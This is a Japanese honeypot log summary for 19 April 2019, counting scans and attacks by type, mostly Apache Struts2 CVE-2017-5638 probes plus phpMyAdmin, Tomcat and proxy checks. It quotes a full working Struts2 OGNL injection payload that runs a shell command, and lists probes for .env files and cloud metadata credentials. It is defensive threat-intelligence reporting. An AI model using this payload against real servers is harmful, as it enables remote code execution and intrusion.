BW-Potのログ分析 (2019/04/19)
本日の総アクセス件数は283件です。送信元IP数は74IPです。
拡張子が以下のような通信先に対し、
Apache Struts2 の脆弱性(CVE-2017-5638)に関する通信を観測しています。
・.do
・.htm
・.html
・.jsp
・.actioon
Conternt-Type
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nMaskCustomMuttMoloz').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
| 件数 | 種別 | リクエスト |
| 74 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 62 | アクセス | GET / |
| 8 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html/ |
| 6 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /login.do |
| 3 | Amazon EC2 インスタンスメタデータの調査 | GET 169.254.169[.]254/latest/meta-data |
| 3 | 不正中継の調査 | POST 188.166.41[.]194/tmUnblock.cgi |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /index.action |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /struts2-rest-showcase/orders.xhtml |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /index.do |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /home.do |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /home.htm |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /home.jsp |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /home.xhmtl |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /index.htm |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /index.html |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /index.jsp |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /index.xhtml |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /login.action |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /login.htm |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /login.xhtml |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /main.action |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /main.do |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /main.htm |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /main.jsp |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /main.xhtml |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /register.action |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /register.do |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /register.xhtml |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /site.action |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /site.do |
| 3 | Apache Struts 2の脆弱性(CVE-2017-5638)に関する調査 | GET /site.xhtml |
| 3 | 環境設定の調査 | GET /.env |
| 2 | 不正中継の調査 | GET www.msftncsi[.]com/ncsi.txt |
| 2 | D-Link デバイスに関する調査 | GET /HNAP1/ |
| 2 | SQLiteに関する調査 | GET /SQLite/main.php |
| 2 | SQLiteに関する調査 | GET /SQLiteManager-1.2.4/main.php |
| 2 | SQLiteに関する調査 | GET /SQLiteManager/main.php |
| 2 | SQLiteに関する調査 | GET /SQlite/main.php |
| 2 | SQLiteに関する調査 | GET /agSearch/SQlite/main.php |
| 2 | SQLiteに関する調査 | GET /sqlite/main.php |
| 2 | SQLiteに関する調査 | GET /sqlitemanager/main.php |
| 2 | SQLiteに関する調査 | GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php |
| 2 | phpMyAdminに関する調査 | GET /phpmyadmin/ |
| 2 | phpMyAdminに関する調査 | GET /phpmyadmin/scripts/setup.php |
| 2 | 不明 | GET /hudson/script |
| 2 | 不明 | GET /main.php |
| 2 | 不明 | GET /script |
| 1 | 不正中継の調査 | GET api.binance[.]com/api/v1/ticker/24hr?symbol=BTCUSDT |
| 1 | 不正中継の調査 | GET api.binance[.]com/api/v1/time |
| 1 | Apache Tomcatの脆弱性(CVE-2017-12617)に関する攻撃 | PUT /JJa06kSy21.jsp/ |
| 1 | D-Link デバイスに関する調査 | GET /HNAP1 |
| 1 | DFindによるスキャン | GET /w00tw00t.at.ISC.SANS.DFind:) |
| 1 | FreePBXに関する調査 | GET /admin//config.php |
| 1 | FreePBXに関する調査 | GET /admin/assets/js/views/login.js |
| 1 | NMAPによるスキャン | GET /Nmap/folder/check1555640709 |
| 1 | NMAPによるスキャン | GET /NmapUpperCheck1555640709 |
| 1 | NMAPによるスキャン | GET /evox/about |
| 1 | NMAPによるスキャン | GET /nmaplowercheck1555640709 |
| 1 | NMAPによるスキャン | POST /sdk |
| 1 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
| 1 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 1 | Tomcat管理ページへのブルートフォース攻撃 | HEAD /manager/html |
| 1 | アクセス | GET /favicon.ico |
| 1 | アクセス | HEAD / |
| 1 | クローリング | GET /robots.txt |
| 1 | サイトの構成調査 | GET /sitemap.xml |
参考リンク
